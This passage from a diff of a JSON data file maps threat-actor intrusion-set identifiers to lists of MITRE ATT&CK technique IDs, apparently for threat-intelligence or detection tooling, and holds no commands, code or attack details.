+ }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1078.004" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1110.003" + }, + { + "mitreAttackId": "attack.t1555" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.004" + }, + { + "mitreAttackId": "attack.t1003.005" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.003" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1036.003" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1222.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1552.002" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1564.004" + }, + { + "mitreAttackId": "attack.t1216.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1550.002" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1608.004" + }, + { + "mitreAttackId": "attack.t1072" + }, + { + "mitreAttackId": "attack.t1550.003" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1589" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1137" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1094" + }, + { + "mitreAttackId": "attack.t1598.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--fe8796a4-2a02-41a0-9d27-7aa1e995feb6": [ + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1132.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.002" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11": [ + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1003.001" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411": [ + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1218.007" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--2fd2be6a-d3a2-4a65-b499-05ea2693abee": [ + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1027" + } + ], + "intrusion-set--35d1b3be-49d4-42f1-aaa6-ef159c880bca": [ + { + "mitreAttackId": "attack.t1048" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1569" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1222.002" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1070.003" + }, + { + "mitreAttackId": "attack.t1070.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1204.003" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1036" + }, + { + "mitreAttackId": "attack.t1552.005" + }, + { + "mitreAttackId": "attack.t1552.004" + }, + { + "mitreAttackId": "attack.t1595.002" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1595.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1136.001" + }, + { + "mitreAttackId": "attack.t1098.004" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1071" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1562.004" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1014" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1496" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1543.002" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1613" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1610" + }, + { + "mitreAttackId": "attack.t1611" + }, + { + "mitreAttackId": "attack.t1609" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1059.003" + }, + { + "mitreAttackId": "attack.t1059.004" + } + ], + "intrusion-set--7ecc3b4f-5cdb-457e-b55a-df376b359446": [ + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1049" + } + ], + "intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7": [ + { + "mitreAttackId": "attack.t1485" + }, + { + "mitreAttackId": "attack.t1597.002" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1621" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1204" + }, + { + "mitreAttackId": "attack.t1589" + }, + { + "mitreAttackId": "attack.t1591.002" + }, + { + "mitreAttackId": "attack.t1591.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1583.003" + }, + { + "mitreAttackId": "attack.t1213.003" + }, + { + "mitreAttackId": "attack.t1213.002" + }, + { + "mitreAttackId": "attack.t1213.001" + }, + { + "mitreAttackId": "attack.t1531" + }, + { + "mitreAttackId": "attack.t1578.002" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1111" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1578.003" + }, + { + "mitreAttackId": "attack.t1078.004" + }, + { + "mitreAttackId": "attack.t1136.003" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1114.003" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1593.003" + }, + { + "mitreAttackId": "attack.t1003.006" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1589.002" + }, + { + "mitreAttackId": "attack.t1098.003" + } + ], + "intrusion-set--277d2f87-2ae5-4730-a3aa-50c1fdff9656": [ + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1556.002" + }, + { + "mitreAttackId": "attack.t1564.005" + } + ], + "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4": [ + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1065" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1583.003" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1070.006" + }, + { + "mitreAttackId": "attack.t1003.001" + }, + { + "mitreAttackId": "attack.t1546.012" + }, + { + "mitreAttackId": "attack.t1070.004" + } + ], + "intrusion-set--c47f937f-1022-4f42-8525-e7a4779a14cb": [ + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1568.003" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1203" + } + ], + "intrusion-set--5cbe0d3b-6fb1-471f-b591-4b192915116d": [ + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--7113eaa5-ba79-4fb3-b68a-398ee9cd698e": [ + { + "mitreAttackId": "attack.t1003" + }, + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1560" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1027.001" + }, + { + "mitreAttackId": "attack.t1074.001" + }, + { + "mitreAttackId": "attack.t1027.003" + }, + { + "mitreAttackId": "attack.t1547.009" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1505.003" + }, + { + "mitreAttackId": "attack.t1197" + }, + { + "mitreAttackId": "attack.t1572" + }, + { + "mitreAttackId": "attack.t1102.003" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1021.004" + }, + { + "mitreAttackId": "attack.t1586.002" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1534" + }, + { + "mitreAttackId": "attack.t1586.001" + }, + { + "mitreAttackId": "attack.t1218.010" + }, + { + "mitreAttackId": "attack.t1585.001" + }, + { + "mitreAttackId": "attack.t1585.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090.003" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1589.001" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--fa19de15-6169-428d-9cd6-3ca3d56075b7": [ + { + "mitreAttackId": "attack.t1566.003" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1056.001" + }, + { + "mitreAttackId": "attack.t1105" + } + ], + "intrusion-set--5f3d0238-d058-44a9-8812-3dd1b6741a8c": [ + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1199" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ], + "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756": [ + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--813636db-3939-4a45-bea9-6113e970c029": [ + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1046" + }, + { + "mitreAttackId": "attack.t1200" + }, + { + "mitreAttackId": "attack.t1571" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1040" + }, + { + "mitreAttackId": "attack.t1219" + }, + { + "mitreAttackId": "attack.t1588.002" + } + ], + "intrusion-set--6eded342-33e5-4451-b6b2-e1c62863129f": [ + { + "mitreAttackId": "attack.t1221" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1119" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1218.005" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + } + ], + "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6": [ + { + "mitreAttackId": "attack.t1201" + }, + { + "mitreAttackId": "attack.t1584.004" + }, + { + "mitreAttackId": "attack.t1124" + }, + { + "mitreAttackId": "attack.t1134.002" + }, + { + "mitreAttackId": "attack.t1584.003" + }, + { + "mitreAttackId": "attack.t1120" + }, + { + "mitreAttackId": "attack.t1584.006" + }, + { + "mitreAttackId": "attack.t1567.002" + }, + { + "mitreAttackId": "attack.t1071.003" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1007" + }, + { + "mitreAttackId": "attack.t1005" + }, + { + "mitreAttackId": "attack.t1049" + }, + { + "mitreAttackId": "attack.t1087.001" + }, + { + "mitreAttackId": "attack.t1583.006" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1027.005" + }, + { + "mitreAttackId": "attack.t1083" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1110" + }, + { + "mitreAttackId": "attack.t1069.002" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1069.001" + }, + { + "mitreAttackId": "attack.t1090.001" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1546.003" + }, + { + "mitreAttackId": "attack.t1025" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1547.004" + }, + { + "mitreAttackId": "attack.t1553.006" + }, + { + "mitreAttackId": "attack.t1546.013" + }, + { + "mitreAttackId": "attack.t1587.001" + }, + { + "mitreAttackId": "attack.t1213" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1012" + }, + { + "mitreAttackId": "attack.t1057" + }, + { + "mitreAttackId": "attack.t1102.002" + }, + { + "mitreAttackId": "attack.t1055" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1078.003" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1615" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1555.004" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.006" + }, + { + "mitreAttackId": "attack.t1016.001" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1041" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1489" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1588.003" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1547.004" + }, + { + "mitreAttackId": "attack.t1036.004" + }, + { + "mitreAttackId": "attack.t1087.002" + }, + { + "mitreAttackId": "attack.t1222.001" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1557.001" + }, + { + "mitreAttackId": "attack.t1082" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1135" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1210" + }, + { + "mitreAttackId": "attack.t1133" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1543.003" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1033" + }, + { + "mitreAttackId": "attack.t1074" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1570" + }, + { + "mitreAttackId": "attack.t1569.002" + }, + { + "mitreAttackId": "attack.t1021.006" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": "attack.t1016" + }, + { + "mitreAttackId": "attack.t1547.001" + }, + { + "mitreAttackId": "attack.t1558.003" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1003.002" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1003.003" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--dcd81c6e-ebf7-4a16-93e0-9a97fa49c88a": [ + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1564.003" + }, + { + "mitreAttackId": "attack.t1090" + }, + { + "mitreAttackId": "attack.t1560.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1560.003" + } + ], + "intrusion-set--e44e0985-bc65-4a8f-b578-211c858128e3": [ + { + "mitreAttackId": "attack.t1189" + }, + { + "mitreAttackId": "attack.t1564.001" + }, + { + "mitreAttackId": "attack.t1568" + }, + { + "mitreAttackId": "attack.t1584.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1203" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1608.004" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + } + ], + "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d": [ + { + "mitreAttackId": "attack.t1069" + }, + { + "mitreAttackId": "attack.t1559.002" + }, + { + "mitreAttackId": "attack.t1059.007" + }, + { + "mitreAttackId": "attack.t1486" + }, + { + "mitreAttackId": "attack.t1562.001" + }, + { + "mitreAttackId": "attack.t1140" + }, + { + "mitreAttackId": "attack.t1588.001" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1106" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1553.005" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1087.003" + }, + { + "mitreAttackId": "attack.t1027.002" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1553.002" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1583.001" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1078.002" + }, + { + "mitreAttackId": "attack.t1552.001" + }, + { + "mitreAttackId": "attack.t1218.007" + }, + { + "mitreAttackId": "attack.t1218.011" + }, + { + "mitreAttackId": "attack.t1555.003" + }, + { + "mitreAttackId": "attack.t1608.001" + }, + { + "mitreAttackId": "attack.t1568.001" + }, + { + "mitreAttackId": "attack.t1059.001" + }, + { + "mitreAttackId": "attack.t1055.001" + }, + { + "mitreAttackId": "attack.t1059.005" + }, + { + "mitreAttackId": "attack.t1059.003" + } + ], + "intrusion-set--b74f909f-8e52-4b69-b770-162bf59a1b4e": [ + { + "mitreAttackId": "attack.t1059" + }, + { + "mitreAttackId": "attack.t1036.005" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1574.001" + }, + { + "mitreAttackId": "attack.t1588.002" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1003.001" + } + ], + "intrusion-set--fd19bd82-1b14-49a1-a176-6cdc46b8a826": [ + { + "mitreAttackId": "attack.t1047" + }, + { + "mitreAttackId": "attack.t1134.001" + }, + { + "mitreAttackId": "attack.t1102" + }, + { + "mitreAttackId": "attack.t1070.001" + }, + { + "mitreAttackId": "attack.t1068" + }, + { + "mitreAttackId": "attack.t1482" + }, + { + "mitreAttackId": "attack.t1071.001" + }, + { + "mitreAttackId": "attack.t1027" + }, + { + "mitreAttackId": "attack.t1105" + }, + { + "mitreAttackId": "attack.t1566.002" + }, + { + "mitreAttackId": "attack.t1074.002" + }, + { + "mitreAttackId": "attack.t1053.005" + }, + { + "mitreAttackId": "attack.t1566.001" + }, + { + "mitreAttackId": "attack.t1204.001" + }, + { + "mitreAttackId": "attack.t1204.002" + }, + { + "mitreAttackId": "attack.t1070.004" + }, + { + "mitreAttackId": "attack.t1518.001" + }, + { + "mitreAttackId": "attack.t1078" + }, + { + "mitreAttackId": "attack.t1112" + }, + { + "mitreAttackId": "attack.t1048.003" + }, + { + "mitreAttackId": "attack.t1021.002" + }, + { + "mitreAttackId": "attack.t1021.001" + }, + { + "mitreAttackId": "attack.t1018" + }, + { + "mitreAttackId": 